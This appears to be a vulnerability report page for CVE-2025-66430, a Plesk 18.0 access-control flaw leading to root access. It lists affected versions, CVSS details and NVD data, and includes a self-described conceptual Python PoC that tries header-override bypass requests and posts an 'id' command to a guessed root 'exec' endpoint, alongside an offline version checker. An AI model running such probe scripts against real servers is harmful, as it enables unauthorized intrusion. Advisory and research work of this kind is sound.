Security Vulnerability Report
CVE-2025-66430 CVSS 9.1 CRITICAL

CVE-2025-66430

Published: 2025-12-12 16:15:45
Last Modified: 2026-01-06 14:59:12

Description

Plesk 18.0 has Incorrect Access Control (CWE-284). According to the vendor advisory linked under References, the flaw is in the Password Protected Directories feature and allows a Plesk user (an authenticated panel account) to gain root-level access to the Plesk server. The NVD version ranges end at 18.0.73.5 and 18.0.74.2, which are the first builds not listed as vulnerable (see Configurations).

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Caveat: this is a Secondary (non-NVD-primary) metric. Its PR:N (no privileges required) does not match the vendor advisory, which describes the issue as exploitable by Plesk users, i.e. from an authenticated account; with PR:L the base score would be lower, so treat 9.1 as an upper bound and prioritize on the root-level impact rather than the number.

Configurations (Affected Products)

cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:* - VULNERABLE for 18.0.70 <= version < 18.0.73.5
cpe:2.3:a:plesk:plesk:*:-:*:*:*:*:*:* - VULNERABLE for 18.0.74 <= version < 18.0.74.2
Plesk Obsidian 18.0.70 through 18.0.73.4 (first non-vulnerable build: 18.0.73.5)
Plesk Obsidian 18.0.74 through 18.0.74.1 (first non-vulnerable build: 18.0.74.2)
Builds of Plesk 18.0 outside these two ranges (18.0.69 and earlier, 18.0.73.5+, 18.0.74.2+) are not listed as affected in the NVD configuration data; "all 18.0 sub-versions" overstates the exposure.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The request paths it uses for the "bypass" and "exec" steps are illustrative (the script itself calls it a conceptual PoC, and the vendor advisory does not publish exploit details), so an HTTP 200 from those paths is not evidence that a host is exploitable; check the installed Plesk version against the affected ranges above instead.
python
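# CVE-2025-66430 PoC - Plesk 18.0 Incorrect Access Control
# Note: This is a conceptual PoC for educational purposes only.
# Ensure you have authorization before testing any vulnerability.
#
# NOTE(review): the vendor advisory describes this CVE as a Password Protected
# Directories flaw that lets a Plesk *user* (an authenticated account) gain
# root-level access; it does not publish request paths.  The paths used in
# steps 2 and 3 below were carried over from the original write-up and are NOT
# taken from the advisory, so an HTTP 200 from them is not proof of exposure.
# The only grounded indicator in this script is the offline version check
# against the NVD affected ranges (18.0.70 <= v < 18.0.73.5 and
# 18.0.74 <= v < 18.0.74.2).
import os
import re
import sys

try:
    import requests
except ImportError:  # keep the module importable so the offline version check still works
    requests = None

__all__ = ["AFFECTED_RANGES", "is_affected_version", "exploit_cve_2025_66430"]

# Target configuration.  Override through the environment instead of editing
# the file so real credentials never end up in a script that gets shared.
TARGET_URL = os.environ.get("PLESK_TARGET_URL", "https://target-plesk-server:8443")
USERNAME = os.environ.get("PLESK_USERNAME", "plesk_user")
PASSWORD = os.environ.get("PLESK_PASSWORD", "user_password")

# Affected version ranges from the NVD configuration data for this CVE:
# (start inclusive, end exclusive).  The end bounds are the first builds not
# listed as vulnerable.
AFFECTED_RANGES: tuple[tuple[str, str], ...] = (
    ("18.0.70", "18.0.73.5"),
    ("18.0.74", "18.0.74.2"),
)

# "18.0.73.5", "v18.0.73.5", "18.0.73 Update #5" and "18.0.73 Update 5" all
# parse to the same tuple.  Anything after the first non-version token is
# ignored (best effort; confirm against real `plesk version` output).
_VERSION_RE = re.compile(r"(\d+(?:\.\d+)*)(?:\s+update\s*#?\s*(\d+))?", re.IGNORECASE)


def _version_tuple(version: str) -> tuple[int, ...]:
    """Parse a Plesk version string into a comparable tuple of ints.

    Trailing zero components are dropped so ``18.0.70.0`` compares equal to
    ``18.0.70``.

    Raises:
        ValueError: if no numeric version is found in *version*.
    """
    match = _VERSION_RE.search(version)
    if match is None:
        raise ValueError(f"unparseable Plesk version string: {version!r}")
    parts = [int(piece) for piece in match.group(1).split(".")]
    if match.group(2) is not None:
        parts.append(int(match.group(2)))
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """Return True if *version* falls inside an NVD-listed affected range.

    This is the offline check a practitioner can run from the panel's reported
    version without sending anything to the target.

    Raises:
        ValueError: if *version* cannot be parsed.
    """
    parsed = _version_tuple(version)
    return any(
        _version_tuple(start) <= parsed < _version_tuple(end)
        for start, end in AFFECTED_RANGES
    )


def exploit_cve_2025_66430(*, verify_tls: bool = False, timeout: float = 30) -> bool:
    """Run the conceptual three-step probe against TARGET_URL.

    Step 1 logs in through ``/login_up.php`` with USERNAME/PASSWORD.  Steps 2
    and 3 request illustrative paths (see the header comment) and count as
    "success" only on HTTP 200; they do not verify that anything was actually
    bypassed or executed.

    Args:
        verify_tls: verify the server certificate.  Defaults to False to match
            the original PoC (self-signed panel certificates are common), but
            that means the credentials sent in step 1 can be intercepted by an
            on-path attacker.
        timeout: per-request timeout in seconds.

    Returns:
        True only if every step returned HTTP 200; False otherwise, including
        on any network error.

    Raises:
        RuntimeError: if the ``requests`` package is not installed.
    """
    if requests is None:
        raise RuntimeError("the 'requests' package is required: pip install requests")

    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] Exploiting CVE-2025-66430...")
    if not verify_tls:
        print(
            "[!] TLS certificate verification is disabled; the login credentials "
            "can be read by an on-path attacker",
            file=sys.stderr,
        )

    session = requests.Session()
    auth_url = f"{TARGET_URL}/login_up.php"
    auth_data = {
        "login_name": USERNAME,
        "passwd": PASSWORD,
        "locale": "en-US",
    }

    try:
        # Step 1: authenticate with Plesk.  The cookie-name check is inherited
        # from the original PoC -- presumably Plesk sets a cookie whose name
        # contains "session" on success; confirm against a real panel.
        response = session.post(auth_url, data=auth_data, verify=verify_tls, timeout=timeout)
        if response.status_code != 200 or "session" not in session.cookies.get_dict():
            print("[-] Authentication failed!")
            return False
        print("[+] Authentication successful!")

        # Step 2: illustrative password-protected directory request with
        # URL-override headers.  A 200 here proves only that the path answered.
        bypass_url = f"{TARGET_URL}/plesk-password-protected-virtdir/"
        headers = {
            "X-Original-URL": "/",
            "X-Rewrite-URL": "/",
        }
        response = session.get(bypass_url, headers=headers, verify=verify_tls, timeout=timeout)
        if response.status_code != 200:
            return False
        print("[+] Step 2 returned HTTP 200 (bypass path answered; not verified)")
        print(f"[+] Response length: {len(response.content)} bytes")

        # Step 3: illustrative "exec" endpoint.  Not documented by the vendor;
        # a 200 does not mean a command ran as root.
        priv_esc_url = f"{TARGET_URL}/api/v2/plesk-password-protected-virtdir/exec"
        priv_esc_data = {
            "command": "id",
            "target": "root",
        }
        response = session.post(priv_esc_url, json=priv_esc_data, verify=verify_tls, timeout=timeout)
        if response.status_code != 200:
            return False
        print("[+] Step 3 returned HTTP 200 (exec path answered; not verified)")
        print(f"[+] Response: {response.text}")
        return True
    except requests.exceptions.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return False


if __name__ == "__main__":
    # Offline mode: `python poc.py 18.0.73.4` checks a version string against
    # the NVD affected ranges without touching any host.
    if len(sys.argv) > 1:
        try:
            affected = is_affected_version(sys.argv[1])
        except ValueError as exc:
            print(f"[-] {exc}")
            sys.exit(2)
        marker = "!" if affected else "-"
        where = "inside" if affected else "outside"
        print(f"[{marker}] Version {sys.argv[1]} is {where} the NVD affected ranges")
        sys.exit(1 if affected else 0)

    if exploit_cve_2025_66430():
        print(
            "\n[!] All probe requests returned HTTP 200 - verify manually; "
            "this is not proof of CVE-2025-66430"
        )
        sys.exit(0)
    print("\n[-] Exploitation failed or target is patched")
    sys.exit(1)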

References
- Vendor advisory: https://support.plesk.com/hc/en-us/articles/36261922405015--CVE-2025-66430-Security-vulnerability-in-Password-Protected-Directories-allows-Plesk-users-to-gain-root-level-access-to-a-Plesk-server
- Product release notes: https://docs.plesk.com/release-notes/obsidian/whats-new/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66430", "sourceIdentifier": "[email protected]", "published": "2025-12-12T16:15:44.980", "lastModified": "2026-01-06T14:59:12.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plesk 18.0 has Incorrect Access Control."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plesk:plesk:*:*:*:*:*:*:*:*", "versionStartIncluding": "18.0.70", "versionEndExcluding": "18.0.73.5", "matchCriteriaId": "FC8197AF-D516-4B11-9348-ED1E7A707C40"}, {"vulnerable": true, "criteria": "cpe:2.3:a:plesk:plesk:*:-:*:*:*:*:*:*", "versionStartIncluding": "18.0.74", "versionEndExcluding": "18.0.74.2", "matchCriteriaId": "314C9CDF-22D8-418A-8BBB-504794C0680A"}]}]}], "references": [{"url": "https://docs.plesk.com/release-notes/obsidian/whats-new/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.plesk.com/hc/en-us/articles/36261922405015--CVE-2025-66430-Security-vulnerability-in-Password-Protected-Directories-allows-Plesk-users-to-gain-root-level-access-to-a-Plesk-server", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}